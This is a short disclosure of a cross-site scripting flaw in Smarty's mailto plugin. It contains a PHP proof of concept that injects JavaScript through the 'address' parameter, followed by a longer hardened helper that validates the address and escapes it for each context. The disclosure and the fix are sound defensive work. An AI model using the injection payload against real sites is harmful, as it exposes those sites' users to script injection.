I found a bug in the Smarty package, specifically in the smarty_function_mailto($params) function.
Remote exploitation of this vulnerability is unlikely, but it is still advisable to take it into account.
A web page that uses this function and whose parameters can be populated from GET or POST input would allow a malicious user to inject JavaScript code, resulting in cross-site scripting.
The following code injects JavaScript code into the smarty_function_mailto function:
===============================================================
<?php
// Assumes the Smarty mailto plugin (smarty_function_mailto) is already loaded.
$params = array(
    'encode'  => 'javascript',
    // The inner single quote is escaped as \' so that PHP keeps the whole
    // payload inside one string literal.
    'address' => 'iricartb@gmail.com">iricartb@gmail.com\'); alert("- JavaScript Injected -"); //',
);
echo smarty_function_mailto($params);
===============================================================
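As an added example (not code from Smarty or from the reporter), here is a hardened mailto helper in PHP. It mirrors the general shape of the plugin's javascript mode (build the anchor, wrap it in document.write(), percent-encode it into eval(unescape())); the function names hardened_mailto and is_plausible_address and the exact internal structure are assumptions, not Smarty's implementation. The fix has two layers: the address must pass filter_var() e-mail validation, and every value is escaped for the context it lands in (htmlspecialchars() for the markup, json_encode() for the JavaScript string literal), so the quote-and-parenthesis payload above is rejected outright and, even if validation were relaxed, could no longer terminate the document.write() string.

```php
<?php
// Added example (not Smarty's own code): a hardened mailto helper that
// validates the address and encodes it for every context it lands in.

function is_plausible_address(string $address): bool
{
    // Reject anything that is not a syntactically valid e-mail address.
    // Quotes, parentheses and spaces never survive this check.
    return filter_var($address, FILTER_VALIDATE_EMAIL) !== false;
}

function hardened_mailto(array $params): string
{
    $address = $params['address'] ?? '';
    $text    = $params['text'] ?? $address;
    $encode  = $params['encode'] ?? 'none';

    if (!is_plausible_address($address)) {
        // Fail closed: never emit attacker-controlled text into markup or JS.
        return '';
    }

    // Context 1: HTML attribute value and element body.
    $html = '<a href="mailto:' . htmlspecialchars($address, ENT_QUOTES, 'UTF-8') . '">'
          . htmlspecialchars($text, ENT_QUOTES, 'UTF-8') . '</a>';

    if ($encode !== 'javascript') {
        return $html;
    }

    // Context 2: a JavaScript string literal inside document.write().
    // json_encode() with the HEX flags escapes quotes, backslashes, <, >, &
    // and line terminators, so the markup cannot end the string literal or
    // the surrounding <script> element.
    $flags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT;
    $js = 'document.write(' . json_encode($html, $flags) . ');';

    // Same percent-encoding scheme the plugin's javascript mode uses, so the
    // plain address does not appear in the page source.
    $encoded = '';
    for ($i = 0, $n = strlen($js); $i < $n; $i++) {
        $encoded .= '%' . bin2hex($js[$i]);
    }
    return '<script type="text/javascript">eval(unescape(\'' . $encoded . '\'))</script>';
}

// Usage (constructed inputs): the report's payload is rejected by validation
// and yields an empty string; a clean address is encoded normally.
$payload = array(
    'encode'  => 'javascript',
    'address' => 'iricartb@gmail.com">iricartb@gmail.com\'); alert("- JavaScript Injected -"); //',
);
var_dump(hardened_mailto($payload));
echo hardened_mailto(array('encode' => 'javascript', 'address' => 'user@example.com')), "\n";
```

Validation alone stops this particular payload, but the per-context encoding is the part that generalises: any value that is interpolated first into HTML and then into a JavaScript string must be escaped once for each of those contexts, in that order.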